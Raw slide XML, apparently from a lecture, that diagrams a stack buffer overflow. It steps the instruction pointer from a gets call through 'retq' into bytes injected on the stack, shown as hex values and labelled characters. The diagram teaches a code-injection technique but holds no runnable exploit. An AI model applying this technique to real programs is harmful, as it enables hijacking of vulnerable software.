                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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1" name="Rectangle 130">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24D05F5F-7385-8147-935F-3612650E6ADE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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2" name="Rectangle 131">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FD7CB3-B9FD-1B4C-9B97-7E05E893B5FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="969238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3" name="Rectangle 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A7FE4F-59E6-9442-A7A3-47BEC15AB0FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159"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4" name="Rectangle 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDE98C05-E5A8-074D-B3B7-7B292C407FBC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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5" name="Rectangle 134">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60D080A-927B-A447-8C74-66EFC59D2449}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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6" name="Rectangle 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBD4F5B-C78C-6744-B443-4127AE363184}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1066671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7" name="Rectangle 136">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73D42B1-089C-D040-AE86-A70AE3AF6FCB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803"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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{946CCFC5-5889-294C-81E2-B14AA102C93C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901543" y="4341806"/>
            <a:ext cx="4221027" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400626</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>callq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="TextBox 186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FE1A5B-8C3D-8847-B885-837ADCB6B09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341805"/>
            <a:ext cx="3802644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x40062B</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>leaq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a: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188" name="TextBox 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7D2DA9-A1B2-2349-9B90-FCAFA68BA477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4341744"/>
            <a:ext cx="3244799" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400635</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="195" name="Group 194">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{803DBFC0-D948-4D47-A86A-7DC86B854A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="3760081"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="196" name="TextBox 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C1A1513-7CD9-2747-94F6-8ECC89904FD7}"/>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0x7FFFFFFFE008</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="197" name="Straight Arrow Connector 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6735059C-A8A6-7E4F-B1C9-3F1A67AFB6DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="196"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66895C5B-50A2-D144-B2DB-AE81C163C22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4339473"/>
            <a:ext cx="1792478" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x400639</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="TextBox 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BC52E4-0D89-AA42-86F6-6367F9E15DBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6899615" y="4346052"/>
            <a:ext cx="2826415" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="682625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%rip =	0x7FFFFFFFDFF8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x400648</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="204" name="Group 203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF69835-F3E2-7D41-B530-EBA1C8B60B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5553649" y="2977777"/>
            <a:ext cx="2667619" cy="369332"/>
            <a:chOff x="8434922" y="6044017"/>
            <a:chExt cx="2667619" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205" name="TextBox 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CD4C8B-C3F9-9A45-A2D8-E09C00CCF6F3}"/>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0x7FFFFFFFE010</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="206" name="Straight Arrow Connector 205">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68CAC67-9A65-5844-A3E0-6D218821FDE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="205"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7" name="Straight Arrow Connector 206">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E575F19-AC1B-A54F-9067-A7360B4D84B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="200" idx="1"/>
            <a:endCxn id="128" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5530439" y="4669218"/>
            <a:ext cx="1369176" cy="107788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08" name="Group 207">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8318FE3B-BFE3-3747-8B6A-AAC0CC192E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="702453" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="209" name="Group 208">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4051D3-B2A6-3640-BBA2-1CA06C660A8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="246" name="Rectangle 245">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9572107E-2DB5-C244-BC2D-74EBB9F0FEFD}"/>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247" name="Rectangle 246">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E671857C-1AD3-A242-AE50-845C847CE080}"/>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248" name="Rectangle 247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589A581D-0515-C04A-A22E-3DD8112E5588}"/>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C3</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>???</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="249" name="Rectangle 248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A86B300-E55C-B441-8D9C-C79A2E33792B}"/>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250" name="Rectangle 249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3987421-E5A3-5D4A-940E-3EFBD01BF343}"/>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40</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'@'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="251" name="Rectangle 250">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24332584-F762-4E42-A5CF-B66465D00882}"/>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06</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>ACK</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="252" name="Rectangle 251">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869A5DCE-0E50-C141-B138-73C0038FEBAA}"/>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48</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'H'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Rectangle 252">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F139CC82-9E95-C040-825D-DC7EDCAC2A68}"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="210" name="Group 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAAF66D5-2633-3842-8D52-65C9A8A73D70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="238" name="Rectangle 237">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6906FF95-A19A-0B40-AF2A-873351CA61C7}"/>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39" name="Rectangle 238">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A263CE3F-1EA0-1844-B235-F6001372FFD8}"/>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0" name="Rectangle 239">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA3CCE7-E84A-C848-ADF4-F7722F4EAD3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1" name="Rectangle 240">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692D2172-C8ED-C74B-9E1C-5EA71CE8AF0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2" name="Rectangle 241">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609BA8DD-FD8C-3042-9D65-F0738027E16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3" name="Rectangle 242">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5C6EE9-5E78-BE46-968F-396A167F4326}"/>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4" name="Rectangle 243">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDFB624-CDCE-344C-984D-8935E63F7784}"/>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5" name="Rectangle 244">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280C456A-269C-3D47-845C-DB4D1B239FBD}"/>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211" name="Group 210">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC07570-346F-ED4B-94B5-2D8CDEBC8DBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="230" name="Rectangle 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687869B9-101F-A448-A335-027E6AB84887}"/>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1" name="Rectangle 230">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92B3347-0556-D443-A56D-74133B09A309}"/>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2" name="Rectangle 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13CBED9E-EA7D-DB43-982D-4558CB84FAB5}"/>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3" name="Rectangle 232">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B3F075-A3EF-6845-89FF-B8A55CDF83C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4" name="Rectangle 233">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D757B7-6149-9B45-AE4C-EAF7829FCAB6}"/>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5" name="Rectangle 234">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7543E14-94B5-8F40-9834-1CE42A00C9B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6" name="Rectangle 235">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4C874C-743F-CB47-8E28-428F9774A90F}"/>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7" name="Rectangle 236">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3608A20-74F9-E140-844E-8BC0B5DB3A8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nvGrpSpPr>
            <p:cNvPr id="212" name="Group 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{810CBD4F-2C99-014A-97D1-53DF77A0E964}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="222" name="Rectangle 221">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BF4E0B-6683-2F4D-A88A-E00FF67B932B}"/>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3" name="Rectangle 222">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4639319-D8B0-CD42-8F27-693490047088}"/>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4" name="Rectangle 223">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
